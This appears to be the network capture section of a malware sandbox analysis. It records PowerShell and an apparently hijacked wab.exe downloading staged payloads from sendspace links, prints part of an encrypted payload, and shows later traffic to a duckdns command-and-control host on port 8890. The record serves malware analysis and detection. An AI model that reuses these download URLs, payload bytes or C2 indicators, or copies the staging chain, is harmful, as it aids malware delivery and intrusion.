May 23, 2024 21:00:28.435192108 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.435198069 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.435220003 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.435237885 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.456641912 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.456691980 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.456748009 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.456754923 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.456777096 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.456794977 CEST  49705        443        192.168.2.5     69.31.136.17
May 23, 2024 21:00:28.488787889 CEST  443          49705      69.31.136.17    192.168.2.5
May 23, 2024 21:00:28.488833904 CEST  443          49705      69.31.136.17    192.168.2.5
                                                                          May 23, 2024 21:00:28.488941908 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.488949060 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.488990068 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.489007950 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.497984886 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.498027086 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.498083115 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.498090029 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.498117924 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.498136997 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.503839016 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.503880024 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.503921986 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.503926992 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.503952026 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.503962994 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.510994911 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.511038065 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.511085033 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.511090040 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.511111975 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.511128902 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.516624928 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.516684055 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.516726017 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.516731024 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.516753912 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.516772032 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.521522999 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.521564960 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.521605968 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.521610022 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.521636963 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.521656036 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.525994062 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.526037931 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.526078939 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.526082993 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.526113987 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.526129007 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.544893980 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.544938087 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.544984102 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.544990063 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.545012951 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.545027018 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.575264931 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.575334072 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.575387955 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.575393915 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.575431108 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.575438023 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.579355001 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.579407930 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.579452991 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.579457045 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.579493999 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.579514027 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.583091021 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.583136082 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.583203077 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.583209991 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.583261013 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.586798906 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.586849928 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.586889029 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.586894035 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.586920023 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.586944103 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.590055943 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.590099096 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.590131044 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.590136051 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.590163946 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.590178967 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.593379974 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.593429089 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.593471050 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.593475103 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.593503952 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.593522072 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.596498966 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.596539974 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.596570969 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.596575022 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.596605062 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.596622944 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.635117054 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.635225058 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.635241032 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.635302067 CEST4434970569.31.136.17192.168.2.5
                                                                          May 23, 2024 21:00:28.635353088 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:00:28.635638952 CEST49705443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:01:01.299082994 CEST62796443192.168.2.5172.67.170.105
                                                                          May 23, 2024 21:01:01.299124956 CEST44362796172.67.170.105192.168.2.5
                                                                          May 23, 2024 21:01:01.299215078 CEST62796443192.168.2.5172.67.170.105
                                                                          May 23, 2024 21:01:01.306812048 CEST62796443192.168.2.5172.67.170.105
                                                                          May 23, 2024 21:01:01.306828022 CEST44362796172.67.170.105192.168.2.5
                                                                          May 23, 2024 21:01:01.778264999 CEST44362796172.67.170.105192.168.2.5
                                                                          May 23, 2024 21:01:01.778451920 CEST62796443192.168.2.5172.67.170.105
                                                                          May 23, 2024 21:01:01.858103991 CEST62796443192.168.2.5172.67.170.105
                                                                          May 23, 2024 21:01:01.858120918 CEST44362796172.67.170.105192.168.2.5
                                                                          May 23, 2024 21:01:01.858448029 CEST44362796172.67.170.105192.168.2.5
                                                                          May 23, 2024 21:01:01.858494997 CEST62796443192.168.2.5172.67.170.105
                                                                          May 23, 2024 21:01:01.861426115 CEST62796443192.168.2.5172.67.170.105
                                                                          May 23, 2024 21:01:01.906495094 CEST44362796172.67.170.105192.168.2.5
                                                                          May 23, 2024 21:01:02.069510937 CEST44362796172.67.170.105192.168.2.5
                                                                          May 23, 2024 21:01:02.069581032 CEST62796443192.168.2.5172.67.170.105
                                                                          May 23, 2024 21:01:02.069588900 CEST44362796172.67.170.105192.168.2.5
                                                                          May 23, 2024 21:01:02.069647074 CEST62796443192.168.2.5172.67.170.105
                                                                          May 23, 2024 21:01:02.074184895 CEST62796443192.168.2.5172.67.170.105
                                                                          May 23, 2024 21:01:02.074224949 CEST44362796172.67.170.105192.168.2.5
                                                                          May 23, 2024 21:01:02.136300087 CEST62797443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:01:02.136339903 CEST4436279769.31.136.17192.168.2.5
                                                                          May 23, 2024 21:01:02.136413097 CEST62797443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:01:02.136761904 CEST62797443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:01:02.136771917 CEST4436279769.31.136.17192.168.2.5
                                                                          May 23, 2024 21:01:02.838867903 CEST4436279769.31.136.17192.168.2.5
                                                                          May 23, 2024 21:01:02.838958979 CEST62797443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:01:02.844604015 CEST62797443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:01:02.844615936 CEST4436279769.31.136.17192.168.2.5
                                                                          May 23, 2024 21:01:02.845408916 CEST4436279769.31.136.17192.168.2.5
                                                                          May 23, 2024 21:01:02.845489025 CEST62797443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:01:02.846168995 CEST62797443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:01:02.890539885 CEST4436279769.31.136.17192.168.2.5
                                                                          May 23, 2024 21:01:03.120213985 CEST4436279769.31.136.17192.168.2.5
                                                                          May 23, 2024 21:01:03.120289087 CEST4436279769.31.136.17192.168.2.5
                                                                          May 23, 2024 21:01:03.120342970 CEST4436279769.31.136.17192.168.2.5
                                                                          May 23, 2024 21:01:03.120389938 CEST62797443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:01:03.120414019 CEST4436279769.31.136.17192.168.2.5
                                                                          May 23, 2024 21:01:03.120446920 CEST62797443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:01:03.120558977 CEST62797443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:01:03.146579981 CEST4436279769.31.136.17192.168.2.5
                                                                          May 23, 2024 21:01:03.146612883 CEST4436279769.31.136.17192.168.2.5
                                                                          May 23, 2024 21:01:03.150168896 CEST62797443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:01:03.150187969 CEST4436279769.31.136.17192.168.2.5
                                                                          May 23, 2024 21:01:03.150522947 CEST62797443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:01:03.210401058 CEST4436279769.31.136.17192.168.2.5
                                                                          May 23, 2024 21:01:03.210445881 CEST4436279769.31.136.17192.168.2.5
                                                                          May 23, 2024 21:01:03.210622072 CEST62797443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:01:03.210645914 CEST4436279769.31.136.17192.168.2.5
                                                                          May 23, 2024 21:01:03.210704088 CEST62797443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:01:03.210704088 CEST62797443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:01:03.228955030 CEST4436279769.31.136.17192.168.2.5
                                                                          May 23, 2024 21:01:03.229053974 CEST62797443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:01:03.229073048 CEST4436279769.31.136.17192.168.2.5
                                                                          May 23, 2024 21:01:03.229135036 CEST62797443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:01:03.229146957 CEST4436279769.31.136.17192.168.2.5
                                                                          May 23, 2024 21:01:03.229195118 CEST62797443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:01:03.310576916 CEST62797443192.168.2.569.31.136.17
                                                                          May 23, 2024 21:01:03.310601950 CEST4436279769.31.136.17192.168.2.5
                                                                          May 23, 2024 21:01:06.760972977 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:01:06.766009092 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:01:06.766079903 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:01:06.769716978 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:01:06.819289923 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:01:07.383835077 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:01:07.395581007 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:01:07.401783943 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:01:07.572267056 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:01:07.616841078 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:01:10.405034065 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:01:10.410362005 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:01:10.410450935 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:01:10.419241905 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:01:24.634196997 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:01:24.639220953 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:01:24.639292955 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:01:24.644640923 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:01:24.943672895 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:01:24.991877079 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:01:25.071120024 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:01:25.090367079 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:01:25.098313093 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:01:25.098375082 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:01:25.103324890 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:01:28.344814062 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:01:28.398094893 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:01:28.473086119 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:01:28.523077011 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:01:38.886215925 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:01:38.891491890 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:01:38.891566992 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:01:38.897195101 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:01:39.212879896 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:01:39.257536888 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:01:39.369255066 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:01:39.376558065 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:01:39.381517887 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:01:39.381618023 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:01:39.386606932 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:01:53.102452040 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:01:53.107644081 CEST88906279812.202.180.134192.168.2.5
                                                                          May 23, 2024 21:01:53.107741117 CEST627988890192.168.2.512.202.180.134
                                                                          May 23, 2024 21:01:53.112731934 CEST88906279812.202.180.134192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 23, 2024 21:00:25.915752888 CEST | 192.168.2.5 | 1.1.1.1 | 0x781c | Standard query (0) | www.sendspace.com | A (IP address) | IN (0x0001) | false
May 23, 2024 21:00:27.137149096 CEST | 192.168.2.5 | 1.1.1.1 | 0xc2ae | Standard query (0) | fs03n4.sendspace.com | A (IP address) | IN (0x0001) | false
May 23, 2024 21:00:53.993345976 CEST | 192.168.2.5 | 1.1.1.1 | 0x2fde | Standard query (0) | 198.187.3.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
May 23, 2024 21:01:01.280939102 CEST | 192.168.2.5 | 1.1.1.1 | 0xca49 | Standard query (0) | www.sendspace.com | A (IP address) | IN (0x0001) | false
May 23, 2024 21:01:02.079384089 CEST | 192.168.2.5 | 1.1.1.1 | 0x123d | Standard query (0) | fs03n3.sendspace.com | A (IP address) | IN (0x0001) | false
May 23, 2024 21:01:06.137931108 CEST | 192.168.2.5 | 1.1.1.1 | 0x3aa6 | Standard query (0) | xvern429.duckdns.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 23, 2024 21:00:25.934050083 CEST | 1.1.1.1 | 192.168.2.5 | 0x781c | No error (0) | www.sendspace.com |  | 172.67.170.105 | A (IP address) | IN (0x0001) | false
May 23, 2024 21:00:25.934050083 CEST | 1.1.1.1 | 192.168.2.5 | 0x781c | No error (0) | www.sendspace.com |  | 104.21.28.80 | A (IP address) | IN (0x0001) | false
May 23, 2024 21:00:27.195399046 CEST | 1.1.1.1 | 192.168.2.5 | 0xc2ae | No error (0) | fs03n4.sendspace.com |  | 69.31.136.17 | A (IP address) | IN (0x0001) | false
May 23, 2024 21:00:54.044219971 CEST | 1.1.1.1 | 192.168.2.5 | 0x2fde | Name error (3) | 198.187.3.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
May 23, 2024 21:01:01.293365002 CEST | 1.1.1.1 | 192.168.2.5 | 0xca49 | No error (0) | www.sendspace.com |  | 172.67.170.105 | A (IP address) | IN (0x0001) | false
May 23, 2024 21:01:01.293365002 CEST | 1.1.1.1 | 192.168.2.5 | 0xca49 | No error (0) | www.sendspace.com |  | 104.21.28.80 | A (IP address) | IN (0x0001) | false
May 23, 2024 21:01:02.135396004 CEST | 1.1.1.1 | 192.168.2.5 | 0x123d | No error (0) | fs03n3.sendspace.com |  | 69.31.136.17 | A (IP address) | IN (0x0001) | false
May 23, 2024 21:01:06.759708881 CEST | 1.1.1.1 | 192.168.2.5 | 0x3aa6 | No error (0) | xvern429.duckdns.org |  | 12.202.180.134 | A (IP address) | IN (0x0001) | false

• www.sendspace.com
• fs03n4.sendspace.com
• fs03n3.sendspace.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 172.67.170.105 | 443 | 6100 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-23 19:00:26 UTC | 174 | OUT | GET /pro/dl/7yi2fu HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: www.sendspace.com
Connection: Keep-Alive
2024-05-23 19:00:27 UTC | 950 | IN | HTTP/1.1 301 Moved Permanently
Date: Thu, 23 May 2024 19:00:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: SID=07ckflbanm4t2u2skdk925fl56; path=/; domain=.sendspace.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: https://fs03n4.sendspace.com/dlpro/c40ece74e11005d648325f5972143ae4/664f924b/7yi2fu/Jordbrets243.sea
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AUUp7yRwXBYJkZxhDDZalhVhPLtDx3VgUYA3OfZx%2FI1ZEK9gK%2BvrlK2RiV%2BiwbnWFUSdy6lyk15oo%2FuaYh0U1bcCdxvdU%2FjIfMVVa7kEwReYQD%2FYlWjXoepRHOY1%2BgsVptp9Ow%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 888749f21e7dc352-EWR
alt-svc: h3=":443"; ma=86400
2024-05-23 19:00:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 69.31.136.17 | 443 | 6100 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-23 19:00:27 UTC | 235 | OUT | GET /dlpro/c40ece74e11005d648325f5972143ae4/664f924b/7yi2fu/Jordbrets243.sea HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: fs03n4.sendspace.com
Connection: Keep-Alive
2024-05-23 19:00:28 UTC | 501 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 23 May 2024 19:00:27 GMT
Content-Type: application/octet-stream
Content-Length: 417828
Last-Modified: Mon, 20 May 2024 13:17:23 GMT
Connection: close
Set-Cookie: SID=qrfpagkuoh6662bbsuco3tf2o2; path=/; domain=.sendspace.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Disposition: attachment;filename="Jordbrets243.sea"
ETag: "664b4d63-66024"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 62796 | 172.67.170.105 | 443 | 6120 | C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-23 19:01:01 UTC | 175 | OUT | GET /pro/dl/lt00vw HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: www.sendspace.com
Cache-Control: no-cache
2024-05-23 19:01:02 UTC | 955 | IN | HTTP/1.1 301 Moved Permanently
Date: Thu, 23 May 2024 19:01:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: SID=ns2pmla9s88ipijkujilaccdr6; path=/; domain=.sendspace.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: https://fs03n3.sendspace.com/dlpro/9b8d52bb1f23ea7f2c058fa6bd7b21b2/664f926d/lt00vw/jXoEkwyvRCuipiJXijfHFGP97.bin
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s1rvw93%2B5CdFwDjk23556I69LP27Qb2FGujG2YCthXgppBa3mRlaufTCWFMVReo8MM9I%2BH332MQ48moE56LsXWdr5A5NyeJY289bCJswTkvlK8sfTYuez25nfRQDSi%2BuIzMZLA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 88874acef97d198e-EWR
alt-svc: h3=":443"; ma=86400
2024-05-23 19:01:02 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.56279769.31.136.174436120C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-23 19:01:02 UTC | 313 | OUT | GET /dlpro/9b8d52bb1f23ea7f2c058fa6bd7b21b2/664f926d/lt00vw/jXoEkwyvRCuipiJXijfHFGP97.bin HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: fs03n3.sendspace.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: SID=ns2pmla9s88ipijkujilaccdr6
2024-05-23 19:01:03 UTC | 437 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Thu, 23 May 2024 19:01:02 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 64576
                                                                          Last-Modified: Mon, 20 May 2024 13:14:30 GMT
                                                                          Connection: close
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Content-Disposition: attachment;filename="jXoEkwyvRCuipiJXijfHFGP97.bin"
                                                                          ETag: "664b4cb6-fc40"
                                                                          Accept-Ranges: bytes
2024-05-23 19:01:03 UTC | 15947 | IN
Data Raw: eb 58 6f 1b 8d 94 f0 5c b7 18 e5 43 65 a4 d6 30 ea ae ca 7e 94 5e 0d 8c 6c 0c b1 41 0f c2 d8 c5 fb a0 7d 17 f7 e7 17 db 70 8d ad d2 6d 1e 61 c6 80 b3 d2 34 26 51 9a 9f 32 a6 b5 ad 43 b8 48 2a 8e 01 a9 17 6c a2 72 f5 5d 46 e9 c1 fd 64 80 35 96 6b 35 ca f6 33 7a 36 5a 65 18 27 5a 1c 83 fa fc d2 3e 8a 37 81 98 dd ae a6 ec ef 42 2d f8 3f 8c 9c 7d 7c 5a 4b e7 fc fe bf 9b 43 e4 4b 1b 10 ac a3 99 3b 76 c5 66 87 a9 42 90 ba 14 e6 99 39 a5 2d f6 56 d1 2e 81 92 f4 7c 5b d9 80 65 c4 89 dd ea a1 a5 fa d7 92 8c bc 4f 63 0c 12 6b ef 58 02 cc e1 0e 45 06 3d d3 4b e7 59 f3 80 0b 18 d2 dd 75 86 69 e5 fb 2e 61 d9 cf 51 f9 97 36 93 72 12 bd f3 0a 1e b2 ce 0a 43 96 98 24 a2 96 7f c4 f5 f7 88 eb ee 3a c8 85 3d 33 43 16 78 f4 28 d4 da 29 fa b2 84 3b b5 11 67 71 51 39 dc 14 1a
                                                                          Data Ascii: Xo\Ce0~^lA}pma4&Q2CH*lr]Fd5k53z6Ze'Z>7B-?}|ZKCK;vfB9-V.|[eOckXE=KYui.aQ6rC$:=3Cx();gqQ9
2024-05-23 19:01:03 UTC | 16384 | IN
Data Raw: 1c 28 f4 05 b6 35 bd ae 34 0b e2 00 b0 03 7f cf fd 78 14 f6 ad a2 f2 1e 77 2e a7 a0 2c 0f 79 3c da 28 4b 9e 38 35 ef e9 89 22 ae 8f 9a ca 64 ef 6c 0a 2e f2 63 26 18 a9 09 50 74 78 8f 6b 54 98 56 a4 3a 7f 5e 5b 39 11 45 a4 52 3a 59 46 e9 81 24 9b 80 35 30 e6 66 ca f6 32 71 35 1d 73 06 48 10 1c 83 f0 da d5 16 0b 37 81 9e d6 ac a1 fa c7 7c 2c f8 35 a4 02 7d 7c 5c 61 e1 dc 22 bf 9b 43 24 02 1b 10 a2 a4 ae 66 76 71 6e 41 8b fd 87 ee b6 8d cd 51 c6 78 d1 0e 22 41 e6 e6 9e 16 6d 92 de 0a aa ec a5 c8 eb 54 da a5 e1 e0 85 5b ac 2d 56 20 aa 75 57 b3 85 6b 6b 09 18 4c 6f e7 5f f0 ef ba 18 d2 8b 39 91 31 a4 f3 25 53 e7 d2 1f bb 4a 36 93 72 52 f4 f3 0a fe a8 41 59 48 97 91 2f a1 7b 69 de 9a ad 88 eb e4 1c cf ad 72 3a 42 10 73 d3 3e fc e5 08 fb b8 88 39 dd 85 67 51 57
